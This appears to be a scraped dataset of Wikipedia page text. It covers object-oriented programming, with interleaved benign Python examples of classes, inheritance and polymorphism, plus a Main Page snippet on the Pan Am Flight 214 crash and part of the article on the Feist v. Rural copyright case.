639 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Object-oriented_programming | Object-oriented programming (OOP) is a programming paradigm based on the concept of objects, 1 which can contain data and code: data in the form of fields (often known as attributes or properties), and code in the form of procedures (often known as methods). In OOP, computer programs are designed by making them out of objects that interact with one another. 2 3 Many of the most widely used programming languages (such as C++, Java, 4 Python, etc.) are multi-paradigm and support object-oriented programming to a greater or lesser degree, typically in combination with imperative programming, procedural programming and functional programming. Significant object-oriented languages include Ada, ActionScript, C++, Common Lisp, C#, Dart, Eiffel, Fortran 2003, Haxe, Java, 4 Kotlin, Logo, MATLAB, Objective-C, Object Pascal, Perl, PHP, Python, R, Raku, Ruby, Scala, SIMSCRIPT, Simula, Smalltalk, Swift, Vala and Visual Basic.NET. Terminology invoking "objects" in the modern sense of object-oriented programming made its first appearance at the artificial intelligence group at MIT in the late 1950s and early 1960s. "Object" referred to LISP atoms with identified properties (attributes). 5 6 Another early MIT example was Sketchpad, created by Ivan Sutherland in 1960–1961; in the glossary of the 1963 technical report based on his dissertation about Sketchpad, Sutherland defined notions of "object" and "instance" (with the class concept covered by "master" or "definition"), albeit specialized to graphical interaction. 7 Also, in 1968, an MIT ALGOL version, AED-0, established a direct link between data structures ("plexes", in that dialect) and procedures, prefiguring what were later termed "messages", "methods", and "member functions". 8 9 Topics such as data abstraction and modular programming were common points of discussion at this time. Independently of later MIT work such as AED, Simula was developed during the years 1961–1967. 8 Simula introduced important concepts that are today an essential part of object-oriented programming, such as class and object, inheritance, and dynamic binding. 10 The object-oriented Simula programming language was used mainly by researchers involved with physical modelling, such as models to study and improve the movement of ships and their content through cargo ports. 10 I thought of objects being like biological cells and/or individual computers on a network, only able to communicate with messages (so messaging came at the very beginning; it took a while to see how to do messaging in a programming language efficiently enough to be useful). Alan Kay, 1 Influenced by the work at MIT and the Simula language, in November 1966 Alan Kay began working on ideas that would eventually be incorporated into the Smalltalk programming language. Kay used the term "object-oriented programming" in conversation as early as 1967. 1 Although sometimes called "the father of object-oriented programming", 11 Alan Kay has differentiated his notion of OO from the more conventional abstract data type notion of object, and has implied that the computer science establishment did not adopt his notion. 1 A 1976 MIT memo co-authored by Barbara Liskov lists Simula 67, CLU, and Alphard as object-oriented languages, but does not mention Smalltalk. 12 In the 1970s, the first version of the Smalltalk programming language was developed at Xerox PARC by Alan Kay, Dan Ingalls and Adele Goldberg.
Smalltalk-72 included a programming environment and was dynamically typed, and at first was interpreted, not compiled. Smalltalk became noted for its application of object orientation at the language level and its graphical development environment. Smalltalk went through various versions and interest in the language grew. 13 While Smalltalk was influenced by the ideas introduced in Simula 67, it was designed to be a fully dynamic system in which classes could be created and modified dynamically. 14 During the late 1970s and 1980s, object-oriented programming rose to prominence. The Flavors object-oriented Lisp was developed starting in 1979, introducing multiple inheritance and mixins. 15 In 1981, Goldberg edited the August issue of Byte Magazine, introducing Smalltalk and object-oriented programming to a wide audience. 16 LOOPS, the object system for Interlisp-D, was influenced by Smalltalk and Flavors, and a paper about it was published in 1982. 17 In 1986, the Association for Computing Machinery organized the first Conference on Object-Oriented Programming, Systems, Languages, and Applications (OOPSLA), which was attended by 1,000 people. Among other developments was the Common Lisp Object System, which integrates functional programming and object-oriented programming and allows extension via a meta-object protocol. In the 1980s, there were a few attempts to design processor architectures that included hardware support for objects in memory, but these were not successful. Examples include the Intel iAPX 432 and the Linn Smart Rekursiv. In the mid-1980s Objective-C was developed by Brad Cox, who had used Smalltalk at ITT Inc., and Bjarne Stroustrup, who had used Simula for his PhD thesis, created the object-oriented C++. 13 In 1985, Bertrand Meyer also produced the first design of the Eiffel language. Focused on software quality, Eiffel is a purely object-oriented programming language and a notation supporting the entire software lifecycle. Meyer described the Eiffel software development method, based on a small number of key ideas from software engineering and computer science, in Object-Oriented Software Construction. 18 Essential to the quality focus of Eiffel is Meyer's reliability mechanism, design by contract, which is an integral part of both the method and language. In the early and mid-1990s object-oriented programming developed as the dominant programming paradigm when programming languages supporting the techniques became widely available. These included Visual FoxPro 3.0, 19 20 21 C++, 22 and Delphi. Its dominance was further enhanced by the rising popularity of graphical user interfaces, which rely heavily upon object-oriented programming techniques. An example of a closely related dynamic GUI library and OOP language can be found in the Cocoa frameworks on Mac OS X, written in Objective-C, an object-oriented, dynamic messaging extension to C based on Smalltalk. OOP toolkits also enhanced the popularity of event-driven programming (although this concept is not limited to OOP). At ETH Zürich, Niklaus Wirth and his colleagues investigated the concept of type checking across module boundaries. Modula-2 (1978) included this concept, and their succeeding design, Oberon (1987), included a distinctive approach to object orientation, classes, and such. Inheritance is not obvious in Wirth's design since his nomenclature looks in the opposite direction: it is called type extension and the viewpoint is from the parent down to the inheritor.
Object-oriented features have been added to many previously existing languages, including Ada, BASIC, Fortran, Pascal, and COBOL. Adding these features to languages that were not initially designed for them often led to problems with compatibility and maintainability of code. More recently, some languages have emerged that are primarily object-oriented, but that are also compatible with procedural methodology. Two such languages are Python and Ruby. Probably the most commercially important recent object-oriented languages are Java, developed by Sun Microsystems, as well as C# and Visual Basic.NET (VB.NET), both designed for Microsoft's .NET platform. Each of these two frameworks shows, in its way, the benefit of using OOP by creating an abstraction from implementation. VB.NET and C# support cross-language inheritance, allowing classes defined in one language to subclass classes defined in the other language. Object-oriented programming uses objects, but not all of the associated techniques and structures are supported directly in languages that claim to support OOP. The features listed below are common among languages considered to be strongly class- and object-oriented (or multi-paradigm with OOP support), with notable exceptions mentioned. 23 24 25 26 Christopher J. Date stated that critical comparison of OOP to other technologies, relational in particular, is difficult because of the lack of an agreed-upon and rigorous definition of OOP. 27 Modular programming support provides the ability to group procedures into files and modules for organizational purposes. Modules are namespaced so identifiers in one module will not conflict with a procedure or variable sharing the same name in another file or module. An object is a data structure or abstract data type containing fields (state variables containing data) and methods (subroutines or procedures defining the object's behavior in code). Fields may also be known as members, attributes, or properties. Objects are typically stored as contiguous regions of memory. Objects are accessed somewhat like variables with complex internal structures, and in many languages are effectively pointers, serving as actual references to a single instance of said object in memory within a heap or stack. Objects sometimes correspond to things found in the real world. 28 For example, a graphics program may have objects such as "circle", "square", and "menu". An online shopping system might have objects such as "shopping cart", "customer", and "product". Sometimes objects represent more abstract entities, like an object that represents an open file, or an object that provides the service of translating measurements from U.S. customary to metric. Objects can contain other objects in their instance variables; this is known as object composition. For example, an object in the Employee class might contain (either directly or through a pointer) an object in the Address class, in addition to its own instance variables like "first name" and "position". Object composition is used to represent "has-a" relationships: every employee has an address, so every Employee object has access to a place to store an Address object (either directly embedded within itself or at a separate location addressed via a pointer). Date and Darwen have proposed a theoretical foundation that uses OOP as a kind of customizable type system to support RDBMS, but it forbids object pointers. 29
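To make the object and composition ideas above concrete, here is a minimal Python sketch (Python being one of the multi-paradigm languages named earlier) of an Employee object that holds fields, methods, and a composed Address object; the attribute and method names are illustrative and not taken from any particular codebase.

class Address:
    """A simple object: fields (state) plus methods (behaviour)."""
    def __init__(self, street, city):
        self.street = street          # field / attribute
        self.city = city

    def as_label(self):               # method operating on the object's own fields
        return f"{self.street}, {self.city}"


class Employee:
    """Object composition: every Employee *has an* Address."""
    def __init__(self, first_name, position, address):
        self.first_name = first_name
        self.position = position
        self.address = address        # an Address object held in an instance variable

    def mailing_label(self):
        # The Employee delegates address formatting to the composed Address object.
        return f"{self.first_name} ({self.position}) - {self.address.as_label()}"


e = Employee("Ada", "Engineer", Address("1 Main St", "Springfield"))
print(e.mailing_label())              # Ada (Engineer) - 1 Main St, Springfield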
The OOP paradigm has been criticized for overemphasizing the use of objects for software design and modeling at the expense of other important aspects (computation and algorithms). 30 31 For example, Rob Pike has said that OOP languages frequently shift the focus from data structures and algorithms to types. 32 Steve Yegge noted that, as opposed to functional programming: 33 Object Oriented Programming puts the nouns first and foremost. Why would you go to such lengths to put one part of speech on a pedestal? Why should one kind of concept take precedence over another? It's not as if OOP has suddenly made verbs less important in the way we actually think. It's a strangely skewed perspective. Rich Hickey, creator of Clojure, described object systems as overly simplistic models of the real world. He emphasized the inability of OOP to model time properly, which is getting increasingly problematic as software systems become more concurrent. 31 Alexander Stepanov compares object orientation unfavourably to generic programming: 30 I find OOP technically unsound. It attempts to decompose the world in terms of interfaces that vary on a single type. To deal with the real problems you need multisorted algebras — families of interfaces that span multiple types. I find OOP philosophically unsound. It claims that everything is an object. Even if it is true it is not very interesting — saying that everything is an object is saying nothing at all. OOP languages are diverse, but typically OOP languages allow inheritance for code reuse and extensibility in the form of either classes or prototypes. These forms of inheritance are significantly different, but analogous terminology is used to define the concepts of object and instance. In class-based programming, the most popular style, each object is required to be an instance of a particular class. The class defines the data format or type (including member variables and their types) and available procedures (class methods or member functions) for a given type or class of object. Objects are created by calling a special type of method in the class known as a constructor. Classes may inherit from other classes, so they are arranged in a hierarchy that represents "is-a-type-of" relationships. For example, class Employee might inherit from class Person. All the data and methods available to the parent class also appear in the child class with the same names. For example, class Person might define variables "first name" and "last name" with a method "make_full_name()". These will also be available in class Employee, which might add the variables "position" and "salary". It is guaranteed that all instances of class Employee will have the same variables, such as the name, position, and salary. Procedures and variables can be specific to either the class or the instance; this leads to terms such as class variables, instance variables, class methods, and instance methods. Depending on the definition of the language, subclasses may or may not be able to override the methods defined by superclasses. Multiple inheritance is allowed in some languages, though this can make resolving overrides complicated. Some languages have special support for other concepts like traits and mixins, though, in any language with multiple inheritance, a mixin is simply a class that does not represent an is-a-type-of relationship. Mixins are typically used to add the same methods to multiple classes, as in the sketch below.
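A minimal Python sketch of the class-based ideas just described, assuming nothing beyond the Person/Employee names and make_full_name method mentioned in the text; the mixin and its greet method are hypothetical additions for illustration.

class GreetingMixin:
    """A mixin: adds the same method to any class that lists it as a base."""
    def greet(self):
        return f"Hello, {self.make_full_name()}"


class Person:
    species = "human"                             # class variable, shared by all instances

    def __init__(self, first_name, last_name):    # constructor
        self.first_name = first_name              # instance variables
        self.last_name = last_name

    def make_full_name(self):
        return f"{self.first_name} {self.last_name}"


class Employee(GreetingMixin, Person):
    """Inherits Person's data and methods ('is-a-type-of') and adds its own."""
    def __init__(self, first_name, last_name, position, salary):
        super().__init__(first_name, last_name)
        self.position = position
        self.salary = salary


e = Employee("Grace", "Hopper", "Rear Admiral", 100000)
print(e.make_full_name())    # inherited from Person: Grace Hopper
print(e.greet())             # provided by the mixin: Hello, Grace Hopper
print(Employee.species)      # class variable visible through the subclass: human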
For example, class UnicodeConversionMixin might provide a method unicode_to_ascii() when included in class FileReader and class WebPageScraper, which do not share a common parent. Abstract classes cannot be instantiated into objects; they exist only for inheritance into other "concrete" classes that can be instantiated. In Java, the final keyword can be used to prevent a class from being subclassed. 34 In contrast, in prototype-based programming, objects are the primary entities. Generally, the concept of a "class" does not even exist. Rather, the prototype or parent of an object is just another object to which the object is linked. In Self, an object may have multiple or no parents, 35 but in the most popular prototype-based language, JavaScript, every object has one prototype link (and only one). New objects can be created based on already existing objects chosen as their prototype. You may call two different objects apple and orange a fruit if the object fruit exists, and both apple and orange have fruit as their prototype. The idea of the fruit class does not exist explicitly, but can be modeled as the equivalence class of the objects sharing the same prototype, or as the set of objects satisfying a certain interface (duck typing). Unlike class-based programming, it is typically possible in prototype-based languages to define attributes and methods not shared with other objects; for example, the attribute sugar_content may be defined in apple but not orange. Some languages like Go do not support inheritance at all. Go states that it is object-oriented, 36 and Bjarne Stroustrup, author of C++, has stated that it is possible to do OOP without inheritance. 37 The doctrine of composition over inheritance advocates implementing has-a relationships using composition instead of inheritance. For example, instead of inheriting from class Person, class Employee could give each Employee object an internal Person object, which it then has the opportunity to hide from external code even if class Person has many public attributes or methods. Delegation is another language feature that can be used as an alternative to inheritance. Rob Pike has criticized the OO mindset for preferring a multilevel type hierarchy with layered abstractions to a three-line lookup table. 38 He has called object-oriented programming "the Roman numerals of computing". 39 Bob Martin states that because they are software, related classes do not necessarily share the relationships of the things they represent. 40 It is the responsibility of the object, not any external code, to select the procedural code to execute in response to a method call, typically by looking up the method at run time in a table associated with the object. This feature is known as dynamic dispatch. If the call variability relies on more than the single type of the object on which it is called (i.e. at least one other parameter object is involved in the method choice), one speaks of multiple dispatch. A method call is also known as message passing. It is conceptualized as a message (the name of the method and its input parameters) being passed to the object for dispatch. Dispatch interacts with inheritance; if a method is not present in a given object or class, the dispatch is delegated to its parent object or class, and so on, going up the chain of inheritance.
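A short Python sketch of the composition-over-inheritance and delegation alternative described above: Employee wraps an internal Person and forwards only the calls it chooses to expose. The Person/Employee names mirror the text's example; everything else is illustrative.

class Person:
    def __init__(self, first_name, last_name):
        self.first_name = first_name
        self.last_name = last_name

    def make_full_name(self):
        return f"{self.first_name} {self.last_name}"


class Employee:
    """Composition over inheritance: an Employee *has a* Person, it is not one."""
    def __init__(self, first_name, last_name, position):
        self._person = Person(first_name, last_name)   # internal object, hidden from callers
        self.position = position

    def make_full_name(self):
        # Delegation: forward the call to the wrapped Person object.
        return self._person.make_full_name()


e = Employee("Alan", "Kay", "Researcher")
print(e.make_full_name(), "-", e.position)             # Alan Kay - Researcher

Because only explicitly forwarded methods are exposed, the wrapped Person stays hidden from external code, which is the benefit the composition-over-inheritance doctrine claims.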
Data abstraction is a design pattern in which data are visible only to semantically related functions, to prevent misuse. The success of data abstraction leads to frequent incorporation of data hiding as a design principle in object-oriented and pure functional programming. Similarly, encapsulation prevents external code from being concerned with the internal workings of an object. This facilitates code refactoring, for example allowing the author of the class to change how objects of that class represent their data internally without changing any external code (as long as "public" method calls work the same way). It also encourages programmers to put all the code that is concerned with a certain set of data in the same class, which organizes it for easy comprehension by other programmers. Encapsulation is a technique that encourages decoupling. In object-oriented programming, objects provide a layer which can be used to separate internal from external code and implement abstraction and encapsulation. External code can only use an object by calling a specific instance method with a certain set of input parameters, reading an instance variable, or writing to an instance variable. A program may create many instances of objects as it runs, which operate independently. This technique, it is claimed, allows easy re-use of the same procedures and data definitions for different sets of data, in addition to potentially mirroring real-world relationships intuitively. Rather than utilizing database tables and programming subroutines, the developer utilizes objects the user may be more familiar with: objects from their application domain. 41 These claims that the OOP paradigm enhances reusability and modularity have been criticized. 42 43 If a class does not allow calling code to access internal object data and permits access through methods only, this is also a form of information hiding. Some languages (Java, for example) let classes enforce access restrictions explicitly, for example denoting internal data with the private keyword and designating methods intended for use by code outside the class with the public keyword. 44 Methods may also be designated public, private, or intermediate levels such as protected (which allows access from the same class and its subclasses, but not objects of a different class). 44 In other languages (like Python) this is enforced only by convention (for example, private methods may have names that start with an underscore). In C#, Swift and Kotlin, the internal keyword permits access only to files present in the same assembly, package, or module as that of the class. 45 In programming languages, particularly object-oriented ones, the emphasis on abstraction is vital. Object-oriented languages extend the notion of type to incorporate data abstraction, highlighting the significance of restricting access to internal data through methods. 46 Eric S. Raymond has written that object-oriented programming languages tend to encourage thickly layered programs that destroy transparency. 47 Raymond compares this unfavourably to the approach taken with Unix and the C programming language. 47 The "open-closed principle" advocates that classes and functions "should be open for extension, but closed for modification". Luca Cardelli has claimed that OOP languages have "extremely poor modularity properties with respect to class extension and modification", and tend to be extremely complex. 42
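As a small sketch of the access conventions discussed above, the following hypothetical Python class exposes public methods while marking internal data with a leading underscore, which Python enforces only by convention (unlike Java's private keyword).

class Account:
    def __init__(self, opening_balance):
        self._balance = opening_balance      # "private" by convention only

    def deposit(self, amount):               # public method: the supported interface
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self._balance += amount

    def balance(self):
        return self._balance


acct = Account(100)
acct.deposit(50)
print(acct.balance())                        # 150
# acct._balance is still reachable, but the underscore signals "internal, do not touch";
# languages such as Java enforce this kind of restriction with the private keyword instead.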
The complexity point is reiterated by Joe Armstrong, the principal inventor of Erlang, who is quoted as saying: 43 The problem with object-oriented languages is they've got all this implicit environment that they carry around with them. You wanted a banana but what you got was a gorilla holding the banana and the entire jungle. Leo Brodie has suggested a connection between the standalone nature of objects and a tendency to duplicate code 48 in violation of the don't repeat yourself principle 49 of software development. Subtyping, a form of polymorphism, is when calling code can be independent of which class in the supported hierarchy it is operating on: the parent class or one of its descendants. Meanwhile, the same operation name among objects in an inheritance hierarchy may behave differently. For example, objects of the type Circle and Square are derived from a common class called Shape. The Draw function for each type of Shape implements what is necessary to draw itself, while calling code can remain indifferent to the particular type of Shape being drawn. This is another type of abstraction that simplifies code external to the class hierarchy and enables strong separation of concerns. A common feature of objects is that methods are attached to them and can access and modify the object's data fields. In this brand of OOP, there is usually a special name such as this or self used to refer to the current object. In languages that support open recursion, object methods can call other methods on the same object (including themselves) using this name. This variable is late-bound; it allows a method defined in one class to invoke another method that is defined later, in some subclass thereof. Simula (1967) is generally accepted as being the first language with the primary features of an object-oriented language. It was created for making simulation programs, in which what came to be called objects were the most important information representation. Smalltalk (1972 to 1980) is another early example and the one with which much of the theory of OOP was developed. Concerning the degree of object orientation, distinctions can be made among languages: many widely used languages, such as C++, Java, and Python, are multi-paradigm and provide object-oriented features alongside other styles. Although in the past object-oriented programming was widely accepted, 51 more recently essays criticizing object-oriented programming and recommending the avoidance of these features (generally in favor of functional programming) have been very popular in the developer community. 52 Paul Graham has suggested that OOP's popularity within large companies is due to "large (and frequently changing) groups of mediocre programmers". According to Graham, the discipline imposed by OOP prevents any one programmer from "doing too much damage". 53 Eric S. Raymond, a Unix programmer and open-source software advocate, has been critical of claims that present object-oriented programming as the "One True Solution". 47 Richard Feldman argues that these languages may have improved their modularity by adding OO features, but they became popular for reasons other than being object-oriented. 54 In an article, Lawrence Krubner claimed that compared to other languages (LISP dialects, functional languages, etc.) OOP languages have no unique strengths, and inflict a heavy burden of unneeded complexity. 55 A study by Potok et al. has shown no significant difference in productivity between OOP and procedural approaches. 56
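Returning to the Shape/Circle/Square example described earlier in this passage, here is a minimal Python sketch of subtype polymorphism and dynamic dispatch; the method is written in lower case as draw, in Python style, and the render helper is an illustrative addition.

class Shape:
    def draw(self):
        raise NotImplementedError        # abstract-style base: subclasses must override


class Circle(Shape):
    def draw(self):
        return "drawing a circle"


class Square(Shape):
    def draw(self):
        return "drawing a square"


def render(shapes):
    # Calling code stays indifferent to the concrete type of each Shape:
    # dynamic dispatch selects Circle.draw or Square.draw at run time.
    for shape in shapes:
        print(shape.draw())


render([Circle(), Square()])             # drawing a circle / drawing a square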
Luca Cardelli has claimed that OOP code is "intrinsically less efficient" than procedural code and that OOP can take longer to compile. 42 In recent years, object-oriented programming has become especially popular in dynamic programming languages. Python, PowerShell, Ruby and Groovy are dynamic languages built on OOP principles, while Perl and PHP have been adding object-oriented features since Perl 5 and PHP 4, and ColdFusion since version 6. The Document Object Model of HTML, XHTML, and XML documents on the Internet has bindings to the popular JavaScript (ECMAScript) language. JavaScript is perhaps the best-known prototype-based programming language, which employs cloning from prototypes rather than inheriting from a class (in contrast to class-based programming). Another scripting language that takes this approach is Lua. The messages that flow between computers to request services in a client-server environment can be designed as the linearizations of objects defined by class objects known to both the client and the server. For example, a simple linearized object would consist of a length field, a code point identifying the class, and a data value. A more complex example would be a command consisting of the length and code point of the command and values consisting of linearized objects representing the command's parameters. Each such command must be directed by the server to an object whose class (or superclass) recognizes the command and can provide the requested service. Clients and servers are best modeled as complex object-oriented structures. Distributed Data Management Architecture (DDM) took this approach and used class objects to define objects at four levels of a formal hierarchy. The initial version of DDM defined distributed file services. It was later extended to be the foundation of Distributed Relational Database Architecture (DRDA). One way to address challenges of object-oriented design is via design patterns, which are solution patterns to commonly occurring problems in software design. Some of these commonly occurring problems have implications and solutions particular to object-oriented development. The following are notable software design patterns for OOP objects. 57 As an example of an object anti-pattern, the God object knows or does too much. It is intuitive to assume that inheritance creates a semantic "is a" relationship, and thus to infer that objects instantiated from subclasses can always be safely used instead of those instantiated from the superclass. This intuition is unfortunately false in most OOP languages, in particular in all those that allow mutable objects. Subtype polymorphism as enforced by the type checker in OOP languages (with mutable objects) cannot guarantee behavioral subtyping in any context. Behavioral subtyping is undecidable in general, so it cannot be implemented by a program (compiler). Class or object hierarchies must be carefully designed, considering possible incorrect uses that cannot be detected syntactically. The principle that addresses this issue is known as the Liskov substitution principle; a short sketch follows below.
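The following minimal Python sketch shows how behavioral subtyping can fail even when the type hierarchy looks correct, using the classic rectangle/square illustration; it is offered as a plausible illustration of the Liskov substitution principle, not an example drawn from the text's sources.

class Rectangle:
    def __init__(self, width, height):
        self.width, self.height = width, height

    def set_width(self, width):
        self.width = width

    def area(self):
        return self.width * self.height


class Square(Rectangle):
    """Mathematically a square 'is a' rectangle, but mutability breaks the contract."""
    def __init__(self, side):
        super().__init__(side, side)

    def set_width(self, width):
        self.width = self.height = width       # keeps the square square


def stretch(rect):
    # Written against Rectangle's contract: only the width should change.
    rect.set_width(10)
    return rect.area()


print(stretch(Rectangle(2, 3)))   # 30, as the caller expects
print(stretch(Square(3)))         # 100: behaviour differs, violating substitutability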
The book describes the following patterns: Both object-oriented programming and relational database management systems (RDBMSs) are extremely common in software today update . Since relational databases do not store objects directly (though some RDBMSs have object-oriented features to approximate this), there is a general need to bridge the two worlds. The problem of bridging object-oriented programming accesses and data patterns with relational databases is known as object-relational impedance mismatch. There are some approaches to cope with this problem, but no general solution without downsides. 58 One of the most common approaches is object-relational mapping, as found in IDE languages such as Visual FoxPro and libraries such as Java Data Objects and Ruby on Rails' ActiveRecord. There are also object databases that can be used to replace RDBMSs, but these have not been as technically and commercially successful as RDBMSs. OOP can be used to associate real-world objects and processes with digital counterparts. However, not everyone agrees that OOP facilitates direct real-world mapping or that real-world mapping is even a worthy goal; Bertrand Meyer argues in Object-Oriented Software Construction that a program is not a model of the world but a model of some part of the world; "Reality is a cousin twice removed". 59 At the same time, some principal limitations of OOP have been noted. 60 For example, the circle-ellipse problem is difficult to handle using OOP's concept of inheritance. However, Niklaus Wirth (who popularized the adage now known as Wirth's law: "Software is getting slower more rapidly than hardware becomes faster") said of OOP in his paper, "Good Ideas through the Looking Glass", "This paradigm closely reflects the structure of systems in the real world and is therefore well suited to model complex systems with complex behavior" 61 (contrast KISS principle). Steve Yegge and others noted that natural languages lack the OOP approach of strictly prioritizing things (objects nouns) before actions (methods verbs). 62 This problem may cause OOP to suffer more convoluted solutions than procedural programming. 63 OOP was developed to increase the reusability and maintainability of source code. 64 Transparent representation of the control flow had no priority and was meant to be handled by a compiler. With the increasing relevance of parallel hardware and multithreaded coding, developing transparent control flow becomes more important, something hard to achieve with OOP. 65 66 67 68 Responsibility-driven design defines classes in terms of a contract, that is, a class should be defined around a responsibility and the information that it shares. This is contrasted by Wirfs-Brock and Wilkerson with data-driven design, where classes are defined around the data-structures that must be held. The authors hold that responsibility-driven design is preferable. SOLID is a mnemonic invented by Michael Feathers which spells out five software engineering design principles: GRASP (General Responsibility Assignment Software Patterns) is another set of guidelines advocated by Craig Larman. Objects are the run-time entities in an object-oriented system. They may represent a person, a place, a bank account, a table of data, or any item that the program has to handle. There have been several attempts at formalizing the concepts used in object-oriented programming. 
A number of concepts and constructs have been used as interpretations of OOP concepts. Attempts to find a consensus definition or theory behind objects have not proven very successful (however, see Abadi and Cardelli, A Theory of Objects 70 for formal definitions of many OOP concepts and constructs), and often diverge widely. For example, some definitions focus on mental activities, and some on program structuring. One of the simpler definitions is that OOP is the act of using "map" data structures or arrays that can contain functions and pointers to other maps, all with some syntactic and scoping sugar on top. Inheritance can be performed by cloning the maps (sometimes called "prototyping"). |
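The row above closes with the reading of OOP as "map" data structures containing functions and pointers to other maps, with inheritance performed by cloning the maps (prototyping). A toy Python sketch of that reading is below; the animal/dog maps and the send helper are invented purely for illustration.

import copy

# An "object" as a plain map whose values may be data or functions.
animal = {
    "name": "generic animal",
    "speak": lambda self: f"{self['name']} makes a sound",
}

# "Inheritance" by cloning the prototype map and overriding some entries.
dog = copy.deepcopy(animal)
dog["name"] = "dog"
dog["speak"] = lambda self: f"{self['name']} barks"

def send(obj, message, *args):
    # Minimal dispatch: look the method up in the map and pass the map as self.
    return obj[message](obj, *args)

print(send(animal, "speak"))  # generic animal makes a sound
print(send(dog, "speak"))     # dog barks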
640 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Main_Page | On December 8, 1963, Pan Am Flight 214 crashed near Elkton, Maryland, killing all 81 crew and passengers. Flight 214 had originated at Isla Verde International Airport in San Juan, flying to Friendship Airport near Baltimore, and then took off for Philadelphia. The crash was Pan Am's first fatal accident with the Boeing 707-121, which it had introduced to its fleet five years earlier. An investigation by the Civil Aeronautics Board concluded that the probable cause of the crash was a lightning strike that had ignited fuel vapors in one of the aircraft's fuel tanks, causing an explosion that destroyed the left wing. The exact manner of ignition was never determined, but the investigation increased awareness of how lightning can damage aircraft, leading to new regulations. The crash also led to research into the safety of several types of aviation fuel and into ways of changing the design of aircraft fuel systems to make them safer in the event of lightning strikes. NGC 3324 is an open cluster in the southern constellation Carina, located northwest of the Carina Nebula at a distance of 9,100 ly (2,800 pc) from Earth. The two are often confused as a single object, and together have been nicknamed the "Gabriela Mistral Nebula" due to its resemblance to the Chilean poet. NGC 3324 was first catalogued by James Dunlop in 1826. This infrared photograph by NASA’s James Webb Space Telescope shows a young, star-forming region in the western section of NGC 3324 known as the "Cosmic Cliffs". Photograph credit: NASA |
641 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Feist_Publications,_Inc.,_v._Rural_Telephone_Service_Co. | Feist Publications, Inc., v. Rural Telephone Service Co., 499 U.S. 340 (1991), was a landmark decision by the Supreme Court of the United States establishing that information alone without a minimum of original creativity cannot be protected by copyright. 1 In the case appealed, Feist had copied information from Rural's telephone listings to include in its own, after Rural had refused to license the information. Rural sued for copyright infringement. The Court ruled that information contained in Rural's phone directory was not copyrightable and that therefore no infringement existed. Rural Telephone Service Company, Inc. is a telephone cooperative providing services for areas in northwest Kansas, with headquarters in the small town of Lenora, in Norton County. The company was under a statutory obligation to compile and distribute a "white pages" phone directory of all its customers free of charge as a condition of its monopoly franchise. Feist Publications, Inc. specialized in compiling telephone directories from larger geographic areas than Rural from other areas of Kansas. It had licensed the directory of 11 other local directories, with Rural being the only holdout in the region. Despite Rural's denial of a license to Feist, Feist copied 4,000 entries from Rural's directory. Because Rural had placed a small number of phony entries to detect copying, Feist was caught. Before this case, the substance of copyright in United States law followed the sweat of the brow doctrine, which gave copyright to anyone who invested significant amount of time and energy into their work. At trial and appeal level the courts followed this doctrine, siding with Rural. The ruling of the court was written by Justice Sandra Day O'Connor. It examined the purpose of copyright and explained the standard of copyrightability as based on originality. The case centered on two well-established principles in United States copyright law: that facts are not copyrightable, and that compilations of facts can be. "There is an undeniable tension between these two propositions", O'Connor wrote in her opinion. "Many compilations consist of nothing but raw data—i.e. wholly factual information not accompanied by any original expression. On what basis may one claim a copyright upon such work? Common sense tells us that 100 uncopyrightable facts do not magically change their status when gathered together in one place. … The key to resolving the tension lies in understanding why facts are not copyrightable: The "Sine qua non of copyright is originality. Rural claimed a collection copyright in its directory. The court clarified that the intent of copyright law was not, as claimed by Rural and some lower courts, to reward the efforts of persons collecting information—the so-called "sweat of the brow" or "industrious collection" doctrine—but rather "to promote the Progress of Science and useful Arts" (U.S. Const. Art. I, 8, cl. 8)—that is, to encourage creative expression. The standard for creativity is extremely low. It need not be novel; it need only possess a "spark" or "minimal degree" of creativity to be protected by copyright. In regard to collections of facts, O'Connor wrote that copyright can apply only to the creative aspects of collection: the creative choice of what data to include or exclude, the order and style in which the information is presented, etc.—not to the information itself. 
If Feist were to take the directory and rearrange it, it would destroy the copyright owned in the data. "Notwithstanding a valid copyright, a subsequent compiler remains free to use the facts contained in another's publication to aid in preparing a competing work, so long as the competing work does not feature the same selection and arrangement", she wrote. The court held that Rural's directory was nothing more than an alphabetic list of all subscribers to its service, which it was required to compile under law, and that no creative expression was involved. That Rural spent considerable time and money collecting the data was irrelevant to copyright law, and Rural's copyright claim was dismissed. All the justices joined O'Connor's opinion except Harry Blackmun, who concurred only in judgment, but did not file a separate opinion. 2 The ruling has major implications for any project that serves as a collection of knowledge. Information (facts, discoveries, etc.) from any source is fair game, but cannot contain any of the "expressive" content added by the source author. That includes not only the author's own comments, but also their choice of which facts to cover, which links to make among the bits of information, the order of presentation (unless it is something obvious like alphabetical), evaluations of the quality of various pieces of information, or anything else that might be considered the author's "original creative work" rather than mere facts. For example, a recipe is a process, and not copyrightable, but the words used to describe it are; see idea-expression divide and Publications International v. Meredith Corp. (1996). 3 Therefore, a recipe can be rewritten with different wording and be published without infringing copyright. If an individual rewrote every recipe from a particular cookbook, they might be found to have infringed the author's copyright in the choice of recipes and their "coordination" and "presentation", even if they used different words, but the West decisions below suggest that this is unlikely unless there is some significant creativity carried over from the original presentation. A sufficiently novel, useful, and unique (i.e. non-obvious) recipe can be granted protection under patent law. 4 Feist proved most important in the area of copyright of legal case law publications. One might assume that the text of U.S. case law is in public domain, but Thomson West claimed a copyright as to the first-page citations and internal pinpoint page citations of its versions of court opinions (case law) found in its printed versions of the case law ("West's citation claims"). West also claimed a copyright in the text of its versions of the case law, which included parallel citations and typographical corrections ("West's text claims"). The text claim would have barred anyone from copying the text of a case from a West case law reporter, since the copied text would include West enhancements to which West claimed copyright. In a 1986 pre-Feist case, West's citation copyright claim was affirmed by the U.S. Court of Appeals for the Eighth Circuit in a preliminary injunction case brought by West against Mead Data, owner of Lexis (West v. Mead), 5 but in a case commenced in 1994 in the U.S. District Court for the Southern District of New York, the U.S. Court of Appeals for the Second Circuit found Feist to have undermined the reasoning in West v. Mead. 
